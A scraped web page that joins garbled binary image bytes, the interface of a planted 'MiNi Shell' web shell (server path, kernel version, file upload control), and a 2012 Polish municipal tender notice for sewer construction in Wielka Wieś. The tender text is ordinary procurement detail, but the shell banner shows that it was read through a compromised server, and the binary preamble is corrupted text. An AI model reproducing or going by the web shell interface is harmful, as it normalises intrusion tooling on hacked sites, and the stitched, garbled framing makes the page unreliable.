JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/168212-N-2012.html

<p class="kh_header"><b>Wielka Wieś: Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi w Gminie Wielka Wieś -w miejscowości Biały Kościół i Prądnik Korzkiewski</b><br>
<b>Numer ogłoszenia: 168212 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi w Gminie Wielka Wieś -w miejscowości Biały Kościół i Prądnik Korzkiewski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. DANE PODSTAWOWE CHARAKTERYZUJĄCE INWESTYCJĘ
pn. Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi w Gminie Wielka Wieś -w miejscowości Prądnik Korzkiewski
Budowa sieci kanałowej, grawitacyjnej w technologii przecisku z odwiertem hydraulicznym zgodnie z  normą PN EN 295 w warunkach gruntów słabych, nawodnionych:											
-- rura kamionkowa przeciskowa, glazurowana, o dopuszczalnej sile wcisku
  2200 kN, łączona na mufę V4A Typ 1- ze stali molibdenowej z uszczelką
  Kauczukową - elastomerową,  DN 400 mm				         181,5 m
								
1.	Budowa sieci kanałowej, grawitacyjnej ułożonej w wykopie otwartym, obudowanym pełnym szalunkiem, odwadnianym, w warunkach gruntów spoistych, rumoszy oraz skał litych:										
-  rura PVC - U,  z litą ścianką, w klasie sztywności obwodowej, SN8 (8,0 kN/m2)															O 200 x 5,9							         725,0 m
O 250 x 7,3							         980,0 m
	O 315 x 9,2							         125,0 m
			O 400 x 11,7					1701,5 +305,0 = 2006,5 m
		
2.	Budowa sieci kanałowej, grawitacyjnej ułożonej w wykopie otwartym, obudowanym pełnym szalunkiem, odwadnianym,  w warunkach gruntów spoistych, rumoszy oraz skał litych:										
-  rura PVC - U, z rdzeniem spienionym, w klasie sztywności obwodowej, SN4 (4,0 
   kN/m2)												
	O 160 x 4,0							         310,0 m

3.	Budowa sieci kanałowej, ciśnieniowej ułożonej w wykopie otwartym, obudowanym pełnym szalunkiem, odwadnianym, w warunkach gruntów spoistych, rumoszy oraz skał litych:

- przewody z polietylenu HDPE, PE 80, SDR 17 
				
O 40  x 2,4							         122,0 m
O 50  x 3,0							         950,0 m
O 63  x 3,8							      1742,0 m
O 90  x 5,4							     108,5,0 m
O 125 x 7,4				        	     	                    2x670,0m		
5.     Przekroczenie dna koryta rzeki Prądnik
	Przekroczenie nr VI na rurociągach przewodowych DN400 PCV - przewiert wykonany rurami stalowymi przewiertowymi DN 600 L= 26,0m
	Przekroczenie nr VII na rurociągach przewodowych DN400 PCV - przewiert wykonany rurami stalowymi przewiertowymi DN 600 L= 24,0 m
        Łączna długość rur przewiertowych = 50m

	Przekroczenie nr V na rurociągach ciśnieniowych PE fi 63 SDR 17- przewiert wykonany rurą osłonową PE fi250  L= 20,0m
	Przekroczenie nr IV na rurociągach ciśnieniowych PE fi 63 SDR 17- przewiert wykonany rurą osłonową PE fi250  L= 12,0m
	Przekroczenie nr III na rurociągach ciśnieniowych PE fi 63 SDR 17- przewiert wykonany rurą osłonową PE fi250  L= 16,0m
	Przekroczenie nr II  na rurociągach ciśnieniowych PE fi 63 SDR 17- przewiert wykonany rurą osłonową PE fi250  L= 16,0m
Łączna długość rur przewiertowych = 64m

	Przekroczenie nr I na rurociągach ciśnieniowych PE fi 50 SDR 17- przewiert wykonany rurą osłonową PE fi250  L= 20,0m
	Przekroczenie nr VIII na rurociągach ciśnieniowych PE fi 50 SDR 17- przewiert wykonany rurą osłonową PE fi250  L= 22,0m
Łączna długość rur przewiertowych = 42m

	
6.	Wykonanie studzien rewizyjnych, betonowych, prefabrykowanych w warunkach gruntów spoistych, rumoszy oraz skał litych oraz gruntów nawodnionych, słabych :											
DN 1200 z odciążeniem					             33 kpl
jw lecz typu lekkiego						             78 kpl

DN 1000 z odciążeniem					                2 kpl
jw lecz typu lekkiego						             22 kpl

7.	Dostawa i montaż kompletnych przydomowych przepompowni ścieków, z zatopioną jedną pompą wirową w zbiorniku PE, DN 1000 mm,                                        	             40 kpl 

8.	Zasilanie indywidualnych przydomowych pompowni ścieków ze skrzynką sterowniczą, kablem YKY5x2,5mm2 o długości                                                                                                800m
							
9.	Montaż armatury napowietrzająco - odpowietrzającej do zabudowy na przewodach ciśnieniowych PE w zakresie średnic od O 40  do O 63 mm, 
wraz z obudową żeliwną,                                                                                                      22 kpl		
10.	Montaż armatury płuczącej do zabudowy na przewodach ciśnieniowych PE w zakresie średnic od O 40  do O 63 mm, wraz z obudową żeliwną                                             33 kpl		                               
11.	Umocnienia skarp koryta rzeki Prądnik po obu stronach brzegu płotkami z kiszki faszynowej, łącznie długość	                                                               	                        245,0 m

12.	Montaż armatury zaporowej, PN 16, do montażu na przewodach     z PE, 
zasuwy do ścieków PE, DN 50, wraz z żeliwną obudową, przedłużeniem
trzpienia oraz skrzynką uliczną, żeliwną						             16 kpl

13.	Przekładka istniejącego wodociągu PE O 125 x 7,1, SDR 17,6		            65,0 m

14.	Nawierzchnie drogowe:
       Rozbiórka i naprawa nawierzchni asfaltowej wraz z podbudową o pow.                   2 200,0  m2
       Naprawa nawierzchni tłuczniowej o pow.                                                                                 889,0 m2

Uwaga! 

	Zamówienie nie obejmuje całego zakresu ujętego w dokumentacji,
 w  kosztorysie ofertowym nie należy wyceniać sieci kanalizacji według projektu na odcinku:
- grawitacja od k do S12 oraz od S6 przez kanał w drodze nr 279/1 do studzienki rozprężnej
- ciśnieniowa od studzienki rozprężnej  do dz. 258/5 wraz z przydomowymi pompowniami od p.p. nr 43-49. (5kpl)
- pompowni przydomowych - 4 kpl. (sekcja 143-dz.nr 63, p.p.11, sekcja 132-dz.nr 32/5 p.p.2,sekcja ,sekcja 192- dz. nr 131/4p.p.31, dz. nr 131/2 p.p.33)

B. DANE PODSTAWOWE CHARAKTERYZUJĄCE INWESTYCJĘ:
pn. Budowa sieci kanalizacji sanitarnej wraz z obiektami towarzyszącymi w Gminie Wielka Wieś -w miejscowości Biały Kościół 
1.	Budowa sieci kanałowej, grawitacyjnej w technologii przecisku urządzeniem z głowicą tarczową zgodnie z  normą PN EN 295 w warunkach skały wapiennej,:									
- rura kamionkowa przeciskowa, glazurowana, o dopuszczalnej sile wcisku
  2200 kN, łączona na mufę V4A Typ 1- ze stali molibdenowej z uszczelką
  Kauczukową - elastomerową,  DN 250                                                             łącznie 250,00 m

	Przekroczenie drogi krajowej nr 94:
	Przewiert nr I  na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową L= 34m
	Przewiert nr II  na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową L= 28 m
	Przewiert nr III na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową L= 48m
	Przewiert nr VI na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową L= 32m
	Przewiert nr VII na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową L=  33m

	Przewiert nr IV  na rurociągach przewodowych tłocznych 2x fi 125 HDPE - przewiert wykonany rurami stalowymi przewiertowymi 2xfi 269 , 1/10 L=  36m oraz na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową 
L= 36m
Przewiert nr V na rurociągach przewodowych DN250 kam. w technologii przecisku z głowicą tarczową L= 34m oraz na rurociągach przewodowych tłocznych fi 90 HDPE - przewiert wykonany rurami stalowymi przewiertowymi fi 269 , 1/10 L=  34m  (uwaga tłoczny na mapie a brak  w projekcie)                                                                łącznie 105,00m

Uwaga:  technologia przecisku uwzględnia montaż studni startowych
 o średnicy DN 3200, oraz odbiorczych DN 2000,
 demontowanych po zakończeniu robót

2.	Budowa sieci kanałowej, grawitacyjnej ułożonej w wykopie otwartym, obudowanym pełnym szalunkiem, odwadnianym, w warunkach gruntów spoistych, rumoszy oraz skał litych:				
-  rura PVC - U,  z litą ścianką, w klasie sztywności obwodowej, 
   SN8 (8,0 kN/m2)	w przedziale średnic O 160 x 4, O 200 x 5,9 	    7428,00 m

jw, lecz	O 250 x 7,3						    4370,00 m
jw, lecz	O 315 x 9,2						       510,00m
jw, lecz	O 400 x 11,7						    1480,00 m

-  rura poliestrowa typu Hobas, PN1, SN 10000
   DN 200, DN 250						 	      190,00 m
						
-  rura PE 80, SDR 17,6
   O 200 x 11,4							 	         45,00 m
                                                                                                                          Łącznie 14 023m
3.	Budowa sieci kanałowej, ciśnieniowej ułożonej w wykopie otwartym, obudowanym pełnym szalunkiem, odwadnianym, w warunkach gruntów spoistych, rumoszy oraz skał litych:

- przewody z polietylenu HDPE, PE 80, SDR 17, w przedziale średnic: 
				
O 40  x 2,4, O 50  x 3,0, O 63  x 3,8, 				   4718,10  m
j/w, lecz O 90 x 5,4						    1200,00 m
j/w, lecz 2 x O 125 x 7,4				          2 x  1500,00 m
	        	     
- przewody z polietylenu HDPE, PE 80, SDR 11, w przedziale średnic:
2 x O 160 x 14,6				  	                2x500,00 m
                                                                                                                      Łącznie 9 918,10m

4.	Wykonanie studzien rewizyjnych, betonowych, prefabrykowanych w warunkach gruntów spoistych, rumoszy oraz skał litych oraz gruntów nawodnionych, słabych :											
DN 1200 z odciążeniem					          450 kpl
jw lecz typu lekkiego						          187 kpl


5.	Dostawa i montaż kompletnych przydomowych przepompowni ścieków, z zatopioną jedną pompą wirową w zbiorniku PE, DN 1000 mm, wyposażoną w szafkę sterowniczą z modułem GMS (monitoring) zgodnie ze specyfikacją - 			                                          72 kpl

6.	Zasilanie indywidualnych przydomowych pompowni ścieków ze skrzynką sterowniczą, kablem YKY 5X2,5 mm2o długości                                                                                                  1 440m
 	
7.	Dostawa i montaż kompletnych strefowych przepompowni ścieków  wraz z komorami zasuw, dla awaryjnego przetłaczania ścieków w komorach z pref. DN 2000 wyposażonych w monitoring wraz z zasilaniem elektrycznym 
PIV 2 x 8,4l/s, PI 2 x 7,2 l/s, PII 2,4 l/s I, PIII 2,4 l/s I, PV 2,4 l/s				 5 kpl


8.	Montaż armatury napowietrzająco - odpowietrzającej do zabudowy na przewodach ciśnieniowych PE w zakresie średnic od O 40  do O 63 mm, wraz z obudową żeliwną, zgodnie ze specyfikacją     									             32 kpl		
9.	Montaż armatury płuczącej do zabudowy na przewodach ciśnieniowych PE w zakresie średnic od O 40  do O 63 mm, wraz z obudową żeliwną, zgodnie ze specyfikacją    48 kpl	

10.	Montaż armatury zaporowej, PN 16, do montażu na przewodach z PE, 
zasuwy do ścieków PE, DN 50, wraz z żeliwną obudową, 
przedłużeniem trzpienia oraz skrzynką uliczną, żeliwną				             73 kpl

11.	Nawierzchnie drogowe:
Rozbiórka i naprawa nawierzchni asfaltowej wraz z podbudową o pow.14 497  m2
Naprawa nawierzchni tłuczniowej o pow. 236 m2

12. Teren pompowni strefowych PI, PII, PIII, PIV, PV
- zagospodarowanie terenu wokół pompowni strefowych 
Elementy ogrodzeniowe zgrzewane (panelowe) w kolorze zielonym + prefabrykowana podmurówka betonowa na słupkach stalowych obsadzonych w cokole - wysokość 1,53m; rozstaw 2,40 m z rur fi 76/3,5 mm.. Wymiar oczka: 100 x 200 mm. Średnica drutu: 5 mm. Druty stalowe ocynkowane, zgrzewane, pomalowane proszkowo. Słupki ze stali ocynkowanej wewnątrz i na zewnątrz, malowane metodą proszkową, wyposażone w plastikowe daszki. Typowe wrota w ramach stalowych na gotowych słupkach, szerokość wrót 3,00 m  (brama dwuskrzydłowa o szerokości 2x 1,50 m co daje 3,00 m i wysokości 1,73m, z ryglem wraz z  poprzecznym ryglem zwieńczony kłódką nierdzewną).
Montaż ogrodzenia systemowego -  łącznie L= 297m.
Teren wokół ogrodzenia należy obsadzić sadzonkami tui wieloletnich.
Teren pompowni oraz wjazd - wyłożyć płytami ażurowymi wypełnionymi  tłuczniem drobnym. Utwardzenie wjazdu zamknąć betonowymi obrzeżami.
Płyty ażurowe na podbudowie:
               - kamień 0,30 do 0,60 na grubości 12 do 15 cm
- kamień 0,00 do 0,35 na grubości 10 cm
- piasek na grubości 4 cm 
Pompownie ścieków wyposażyć w żurawik słupowy obrotowy z wciągarką łańcuchową do demontażu pomp - udźwig min. 500kg (dostawa i montaż).
 Teren pompowni należy oświetlić lampą z wyłącznikiem zmierzchowym.

Uwaga! 

13	Zamówienie nie obejmuje całego zakresu ujętego w dokumentacji,  w  kosztorysie ofertowym nie należy wyceniać :

1)	odcinek kanalizacji ciśnieniowej zaprojektowanej w drodze dz. 372 na długości  L=300m  O PE 63x3,8 przechodzący przez sekcje 124; 123;121; wraz z sięgaczami zakończonymi króćcem PE O50x3,0 na poszczególnych działkach, łącznie na L= 80m oraz  pompownię przydomową p.p. nr 74 z przyłączem na L=6m. / sekcja 124/
2)	odcinek kanalizacji ciśnieniowej zaprojektowanej w drodze dz. nr 378 na długości L = 240m wraz z p.p 65  do dz. 191 ( odcinek od p.p. 66 do p.p 65) / sekcja 124/
3)	pompowni przydomowych -łącznie- 8 kpl ( 2 kpl. jak wyżej). oraz sekcja 131, dz. nr 118/5 - p.p.10, dz. nr 264/1 p .p..11, sekcja 124, dz.  nr. 206- p.p.40 i p.p.72, dz. nr 210-p.p.44, dz. nr 201/6-p.p.69 
4)	Sekcja 072 , dz. 10/1  15m O 200PVC + jedna studzienka 
5)	Sekcja 073, dz. 151/4  61m O 200PVC + dwie studzienki 
6)	Sekcja 133 dz. 303/3, 304/8, 306/5 (niezabudowane) 46m, O 200PVC+ pięć  studzienek 


C	Pompownie ścieków należy wyposażyć oraz uruchomić w ramach systemu monitorowania i zdalnego sterowania i włączyć do istniejącego systemu na terenie gminy. Istniejący system monitorowania wykonany jest przez firmę Control-System

	Do celów projektowych i kosztorysowych dobrano pompownie w oparciu o obliczenia firmy Wilo Polska, kompletowane również przez w/w firmę. Dopuszcza się rozwiązania równoważne.
 Nie dopuszcza się kompletowania pompowni przez zastosowanie wyrobów różnych producentów i dostawców. Pompownie przydomowe stanowić mają kompletny, oryginalny produkt renomowanego producenta, gwarantującego najwyższą jakość wykonawstwa, serwisu, oraz udzielonych gwarancji. 

E	Parametry techniczne jakie powinny spełniać żelbetowe - prefabrykowane studzienki kanalizacyjne:
- elementy  studni betonowe z wyłączeniem przykryw i płyty redukcyjnej;
- podstawa studni ma być wykonana jako monolityczny   element z jednoczesnym   
  uformowaniem kinety i spocznika
- beton klasy min C35/45-(wg PN-EN 206-1;
- w/c- max 0,45;
- nasiąkliwość do 5%;
- stopnie powlekane - wg PN-EN 13101;
- studnie łączone na uszczelkę elastomerową -wg PN-EN 681-1;
- z wieńczenie studni zwężką, przykrywą  lub kręgozwężką;

F	Do odbioru końcowego Wykonawca ma obowiązek dostarczyć komplet  oświadczeń właścicieli  działek objętych  w pozwoleniu na budowę o uporządkowaniu terenu po wykonanych pracach. 

G	Przed odbiorem częściowym i odbiorem końcowym prac kanalizacyjnych, będzie dokonany odbiór systemem kamerowym, przy pomocy specjalistycznych kamer. Monitoring kanalizacji Gmina-jako Inwestor wykona na własny koszt.  Odbiór ten wykonywany zostanie, przy udziale Inspektora nadzoru budowlanego i Kierownika budowy oraz w obecności upoważnionych osób ze strony Wykonawcy i Inwestora.
 Obejmować będzie sprawdzenie danego odcinka instalacji pod względem zgodności stanu wybudowanego z dokumentacją, warunkami technicznymi, zachowania szczelności połączeń rur kanalizacyjnych i odpowiednich spadków.  Każdy odbiór  będzie  podsumowany raportem w wersji pisemnej i graficznej.

H.	W przypadku stwierdzenia podczas monitoringowego odbioru robót kanalizacyjnych - niewłaściwego wykonania przedmiotu umowy, Wykonawca niezależnie od usunięcia wad na odcinku sieci kanalizacyjnej - poniesie koszty takiej kontroli monitoringowej przy użyciu kamer zarówno przy stwierdzeniu niewłaściwości, jak i powtórnej kontroli po usunięciu niewłaściwości.

I	Termin montażu pompowni przydomowych należy uzgodnić z Zamawiający. 

J		Określenie przedmiotu zamówienia jak w załączonych przedmiarach robót i specyfikacji nie zwalnia wykonawcy od dokładnego zapoznania się z dokumentacją techniczną, celem opracowania własnego przedmiaru robót, bowiem przedmiar ten ma stanowić podstawę  do sporządzenia kosztorysu ofertowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.20.00-9, 45.23.13.00-8, 45.23.32.20-7, 45.23.24.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 22.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wadium w kwocie 100.000,00 zł ( sto tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2  roboty budowlane odpowiadającą swoim rodzajem i wartością robocie stanowiącej  przedmiot zamówienia. Za roboty tego samego rodzaju Zamawiający uzna budowę lub przebudowę kanalizacji sanitarnej o wartości minimum 6.000.000,00 zł brutto 
( sześć milionów zł ) każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: 1 kierownikiem budowy posiadającym uprawnienia w zakresie sieci sanitarnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca
wykaże ,że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 1.000.000,00 zł- ( słownie: jeden milion złotych )</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
